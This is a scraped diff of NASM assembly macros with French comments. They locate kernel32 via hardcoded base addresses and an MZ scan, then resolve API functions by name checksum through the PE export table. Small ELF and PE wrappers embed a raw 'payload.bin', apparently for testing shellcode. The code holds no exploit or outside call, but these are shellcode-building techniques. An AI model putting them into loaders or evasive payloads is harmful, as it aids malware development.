%include "win32.inc"
|
||||
|
||||
%macro WIN32DLL.INC 0
|
||||
%define WIN32DLL.INC_TABLE_REGISTER edi
|
||||
%define WIN32DLL.INC_PUSH
|
||||
%define WIN32DLL.INC_9X 0BFF70000h
|
||||
%define WIN32DLL.INC_NT 077F00000h
|
||||
%define WIN32DLL.INC_2000 077E00000h
|
||||
%define WIN32DLL.INC_KERNEL32.DLL WIN32DLL.INC_9X
|
||||
%define WIN32DLL.INC_BYTE_BEGIN 252
|
||||
%define DllChecksum_Define WIN32DLL.INC_BYTE_BEGIN
|
||||
%define DllFunction_Define WIN32DLL.INC_BYTE_BEGIN+1
|
||||
%define DllDll_Define WIN32DLL.INC_BYTE_BEGIN+2
|
||||
%define DllEnd_Define WIN32DLL.INC_BYTE_BEGIN+3
|
||||
%endmacro
|
||||
|
||||
WIN32DLL.INC
|
||||
|
||||
;=================================== DLLs ====================================
|
||||
%macro GetBase 1
|
||||
And %1,0FFFF0000h
|
||||
GetBase_Boucle:
|
||||
cmp word[%1],'MZ'
|
||||
JX e,GetBase_Fin,+1
|
||||
Sub eax,10000h
|
||||
Jmp GetBase_Boucle,-1
|
||||
GetBase_Fin:
|
||||
%endmacro
|
||||
|
||||
%macro Function_GetChecksum 0
|
||||
Function GetChecksum,GetChecksum_Chaine
|
||||
FunctionBegin
|
||||
pushf
|
||||
push esi
|
||||
push edx
|
||||
cld
|
||||
|
||||
mov esi,[GetChecksum_Chaine]
|
||||
Mov edx,0
|
||||
GetChecksum_BoucleChar:
|
||||
Mov eax,0
|
||||
lodsb
|
||||
shl ax,8 ;AX=cc00
|
||||
add edx,eax ;ajoute le caractère au checksum
|
||||
Cmp eax,0
|
||||
JX z,GetChecksum_Fin,+1 ;si fin de chaîne
|
||||
Mov eax,0
|
||||
lodsb ;AX=cc
|
||||
add edx,eax ;ajoute le caractère au checksum
|
||||
Cmp al,0
|
||||
JX nz,GetChecksum_BoucleChar,-1 ;si pas fin de chaîne
|
||||
GetChecksum_Fin:
|
||||
mov eax,edx
|
||||
pop edx
|
||||
pop esi
|
||||
popf
|
||||
FunctionEnd
|
||||
%endmacro
|
||||
|
||||
%macro Function_GetVAExportChecksum 0
|
||||
Function GetVAExportChecksum,GetVAExportChecksum_VA,GetVAExportChecksum_Checksum
|
||||
FunctionBegin
|
||||
pushf
|
||||
push edi
|
||||
push esi
|
||||
push edx
|
||||
push ecx
|
||||
push ebx
|
||||
cld
|
||||
|
||||
mov esi,[GetVAExportChecksum_VA]
|
||||
mov ebx,esi
|
||||
mov ebx,[byte ebx+03Ch]
|
||||
add ebx,esi ;EBX=adresse header PE
|
||||
mov ebx,[byte ebx+078h]
|
||||
add ebx,esi ;EBX=adresse Export Table
|
||||
mov edx,[byte ebx+018h] ;EDX=nombre noms
|
||||
Mov ecx,0 ;ECX=indice courant liste adresses noms
|
||||
|
||||
GetVAExportChecksum_BoucleNom:
|
||||
mov edi,[byte ebx+020h]
|
||||
add edi,esi ;EDI=adresse liste adresses noms
|
||||
mov edi,[edi+4*ecx]
|
||||
add edi,esi ;EDI=adresse chaîne
|
||||
|
||||
push edx
|
||||
mov edx,[GetVAExportChecksum_Checksum] ;EDX=checksum recherché
|
||||
xchg esi,edi ;ESI=adresse chaîne
|
||||
GetVAExportChecksum_BoucleChar:
|
||||
Mov eax,0
|
||||
lodsb
|
||||
shl ax,8 ;AX=cc00
|
||||
sub edx,eax ;soustrait le caractère du checksum
|
||||
Cmp eax,0
|
||||
JX z,GetVAExportChecksum_FinNom,+1 ;si fin de chaîne
|
||||
Mov eax,0
|
||||
lodsb ;AX=cc
|
||||
sub edx,eax ;soustrait le caractère du checksum
|
||||
Cmp al,0
|
||||
JX nz,GetVAExportChecksum_BoucleChar,-1 ;si pas fin de chaîne
|
||||
GetVAExportChecksum_FinNom:
|
||||
xchg esi,edi ;EDI=adresse chaîne
|
||||
test edx,edx
|
||||
pop edx
|
||||
JX z,GetVAExportChecksum_NomTrouve,+1 ;si checksum recherchée
|
||||
|
||||
inc ecx
|
||||
cmp ecx,edx
|
||||
JX nae,GetVAExportChecksum_BoucleNom,-1 ;si pas fin => boucle suivant
|
||||
Mov eax,0
|
||||
Jmp GetVAExportChecksum_Fin,+1 ;sinon fin
|
||||
|
||||
GetVAExportChecksum_NomTrouve:
|
||||
Mov eax,0
|
||||
mov edi,[byte ebx+024h]
|
||||
add edi,esi ;EDI=adresse liste ordinaux
|
||||
mov ax,[edi+2*ecx] ;AX=ordinal
|
||||
|
||||
mov edi,[byte ebx+01Ch]
|
||||
add edi,esi ;EDI=adresse liste adresses
|
||||
mov eax,[edi+4*eax]
|
||||
add eax,esi ;EAX=adresse fonction
|
||||
|
||||
GetVAExportChecksum_Fin:
|
||||
pop ebx
|
||||
pop ecx
|
||||
pop edx
|
||||
pop esi
|
||||
pop edi
|
||||
popf
|
||||
FunctionEnd
|
||||
%endmacro
|
||||
|
||||
%macro DllBegin 0
|
||||
%ifctx Dll
|
||||
Error WIN32DLL,DllBegin =X=> DllBegin
|
||||
%else
|
||||
%push Dll
|
||||
%undef Dll_LoadLibraryA_Define
|
||||
%undef Dll_GetProcAddress_Define
|
||||
%undef Dll_kernel32.dll_Define
|
||||
%assign Dll_Function_Assign 1
|
||||
%define FUNCTION.INC_CONVENTION Std
|
||||
%ifdef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%ifdef WIN32DLL.INC_PUSH
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
push ebp
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edi
|
||||
push edi
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,esi
|
||||
push esi
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edx
|
||||
push edx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ecx
|
||||
push ecx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebx
|
||||
push ebx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,eax
|
||||
push eax
|
||||
%endif
|
||||
%endif
|
||||
Call %$End,+1
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Dll 1-2
|
||||
%ifctx Dll
|
||||
%define Dll_Dll_Define %1
|
||||
%ifdef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%if %0==2
|
||||
%ifnidn %1,kernel32.dll
|
||||
%define Dll_kernel32.dll
|
||||
db %2,DllDll_Define
|
||||
%endif
|
||||
%else
|
||||
Error WIN32DLL,NO_EXTERN_IMPORT => Dll dll,"dll"
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error WIN32DLL,Dll => DllBegin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro DllFunctionExternImport 2-3
|
||||
%if %0==2
|
||||
%ifstr %2
|
||||
db %2,DllFunction_Define
|
||||
%else
|
||||
db DllChecksum_Define
|
||||
dd ~(%2)
|
||||
%endif
|
||||
%1_Equ equ Dll_Function_Assign
|
||||
ExternImport %1,Dll_Dll_Define,[byte WIN32DLL.INC_TABLE_REGISTER+%1_Equ]
|
||||
%assign Dll_Function_Assign Dll_Function_Assign+4
|
||||
%else
|
||||
ExternImport %1,Dll_Dll_Define,%3
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro DllFunction 1-3
|
||||
%ifctx Dll
|
||||
%ifdef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%if %0>1
|
||||
%ifidn %1,LoadLibraryA
|
||||
%if %0==3
|
||||
DllFunctionExternImport %1,%2,%3
|
||||
%define Dll_LoadLibraryA_Define
|
||||
%endif
|
||||
%elifidn %1,GetProcAddress
|
||||
%if %0==3
|
||||
DllFunctionExternImport %1,%2,%3
|
||||
%define Dll_GetProcAddress_Define
|
||||
%endif
|
||||
%else
|
||||
%ifndef Dll_LoadLibraryA_Define
|
||||
DllFunctionExternImport LoadLibraryA,000023761h ;'oL'+'da'+'iL'+'rb'+'ra'+'Ay'
|
||||
%define Dll_LoadLibraryA_Define
|
||||
%endif
|
||||
%ifndef Dll_GetProcAddress_Define
|
||||
DllFunctionExternImport GetProcAddress,00002DBA1h ;'eG'+'Pt'+'or'+'Ac'+'dd'+'er'+'ss'
|
||||
%define Dll_GetProcAddress_Define
|
||||
%endif
|
||||
%if %0==2
|
||||
%ifstr %2
|
||||
%ifndef Dll_kernel32.dll
|
||||
db "kernel32.dll",DllDll_Define
|
||||
%define Dll_kernel32.dll
|
||||
%endif
|
||||
%endif
|
||||
DllFunctionExternImport %1,%2
|
||||
%else
|
||||
DllFunctionExternImport %1,%2,%3
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error WIN32DLL,NO_EXTERN_IMPORT => DllFunction function,"function"|d [,d]
|
||||
%endif
|
||||
%else
|
||||
ExternImport %1,Dll_Dll_Define
|
||||
%endif
|
||||
%else
|
||||
Error WIN32DLL,DllFunction => DllBegin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro DllEnd 0
|
||||
%ifctx Dll
|
||||
%ifdef WIN32.INC_NO_EXTERN_IMPORT
|
||||
db DllEnd_Define
|
||||
Function_GetVAExportChecksum
|
||||
%$End:
|
||||
|
||||
%ifnidn WIN32DLL.INC_KERNEL32.DLL,edx
|
||||
Mov edx,WIN32DLL.INC_KERNEL32.DLL
|
||||
%endif
|
||||
|
||||
pop esi ;ESI=offset jump table
|
||||
push esi
|
||||
mov edi,esi ;EDI=offset jump table
|
||||
mov ebp,esi
|
||||
dec ebp ;EBP=offset jump table-1
|
||||
DllEnd_BoucleNom:
|
||||
mov ebx,esi ;EBX=dÚbut chaîne courante
|
||||
DllEnd_BoucleChar:
|
||||
lodsb
|
||||
cmp al,WIN32DLL.INC_BYTE_BEGIN
|
||||
JX b,DllEnd_BoucleChar,-1 ;si <252
|
||||
|
||||
dec esi ;sinon >=252 =>chaine ou fin
|
||||
Mov ah,0
|
||||
mov [esi],ah ;00 de fin de chaîne
|
||||
inc esi
|
||||
|
||||
cmp al,WIN32DLL.INC_BYTE_BEGIN
|
||||
JX e,DllEnd_252,+1 ;si =252
|
||||
cmp al,WIN32DLL.INC_BYTE_BEGIN+2
|
||||
JX a,DllEnd_End,+1 ;si =255
|
||||
|
||||
push edi ;sauve EDI
|
||||
push esi ;sauve ESI
|
||||
JX e,DllEnd_254,+1 ;si =254
|
||||
|
||||
DllEnd_253: ;sinon =253 => fonction
|
||||
push edx ;sauve EDX
|
||||
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
GetProcAddress(edx,ebx)
|
||||
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
pop edx
|
||||
pop esi
|
||||
pop edi
|
||||
stosd ;ajoute à la jump table
|
||||
Jmp DllEnd_BoucleNom,-1
|
||||
|
||||
DllEnd_252: ;=252 => checksum
|
||||
lodsd
|
||||
not eax
|
||||
TemporaryBegin dword,-,eax
|
||||
%define BYTE.INC_TEMPORARY_REGISTER Temporary_Ret
|
||||
GetVAExportChecksum(edx,eax)
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
TemporaryEnd
|
||||
stosd ;ajoute à la jump table
|
||||
Jmp DllEnd_BoucleNom,-1
|
||||
|
||||
DllEnd_254: ;=254 => dll
|
||||
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
LoadLibraryA(ebx)
|
||||
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
mov edx,eax ;EDX=handle de la DLL
|
||||
pop esi
|
||||
pop edi
|
||||
Jmp DllEnd_BoucleNom,-1
|
||||
|
||||
DllEnd_End: ;=255
|
||||
pop WIN32DLL.INC_TABLE_REGISTER
|
||||
dec WIN32DLL.INC_TABLE_REGISTER
|
||||
%ifdef WIN32DLL.INC_PUSH
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,eax
|
||||
pop eax
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebx
|
||||
pop ebx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ecx
|
||||
pop ecx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edx
|
||||
pop edx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,esi
|
||||
pop esi
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edi
|
||||
pop edi
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
pop ebp
|
||||
%endif
|
||||
%endif
|
||||
%endif
|
||||
%pop
|
||||
%else
|
||||
Error WIN32DLL,DllEnd => DllBegin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,3 @@
|
|||
global _start
|
||||
_start:
|
||||
incbin "payload.bin"
|
|
@ -0,0 +1,71 @@
|
|||
%include "pe.inc"
|
||||
|
||||
BIN_Begin
|
||||
MZHeader
|
||||
MZExtendedHeader
|
||||
MZSection.text_Begin
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,MZSection.text_VA(text_string)
|
||||
mov ah,09
|
||||
int 21h
|
||||
mov ax,4C01h
|
||||
int 21h
|
||||
text_string: db 'This program cannot be run in DOS mode.',0Dh,0Ah,'$'
|
||||
MZSection.text_End
|
||||
|
||||
PEHeader
|
||||
%define PEOptionalheader_EipRVA PESection.text_RVA(PayloadEntry)
|
||||
PEOptionalHeader_Begin
|
||||
PEOptionalHeader_Directory Export,0,0
|
||||
PEOptionalHeader_Directory Import,Import_Directorys_RVA,Import_Directorys_VS
|
||||
PEOptionalHeader_End
|
||||
|
||||
PESectionHeader .text,'.text',PESectionHeader_Flags_EXECUTABLECODE | PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_EXECUTEACCESS | PESectionHeader_Flags_READACCESS| PESectionHeader_Flags_WRITEACCESS
|
||||
PESectionHeader .rdata,'.rdata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
|
||||
PESectionHeader .data,'.data',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
|
||||
PESectionHeader .bss,'.bss', PESectionHeader_Flags_DATA0 | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
|
||||
PESectionHeader .idata,'.idata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
|
||||
PESections_Begin
|
||||
|
||||
PESection.text_Begin
|
||||
PayloadEntry:
|
||||
incbin "payload.bin"
|
||||
call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]
|
||||
PESection.text_End
|
||||
|
||||
PESection.rdata_Begin
|
||||
db 0x90
|
||||
PESection.rdata_End
|
||||
|
||||
PESection.data_Begin
|
||||
db 0x90
|
||||
PESection.data_End
|
||||
|
||||
PESection.bss_Begin
|
||||
resb 0x100
|
||||
PESection.bss_End
|
||||
|
||||
PESection.idata_Begin
|
||||
|
||||
Import_Directorys_Begin .idata
|
||||
Import_Directory KERNEL32
|
||||
Import_Directorys_End
|
||||
|
||||
Import_RVAs_Begin KERNEL32
|
||||
Import_RVA KERNEL32,ExitProcess
|
||||
Import_RVAs_End
|
||||
|
||||
Import_VAs_Begin KERNEL32
|
||||
Import_VA KERNEL32,ExitProcess,0BFF8D4CAh
|
||||
Import_VAs_End
|
||||
|
||||
Import_Strings_Begin KERNEL32
|
||||
Import_String_Function KERNEL32,ExitProcess,"ExitProcess",07Fh
|
||||
Import_String_Dll KERNEL32,"KERNEL32.DLL"
|
||||
Import_Strings_End
|
||||
|
||||
PESection.idata_End
|
||||
|
||||
PESections_End
|
||||
BIN_End
|
Loading…
Reference in New Issue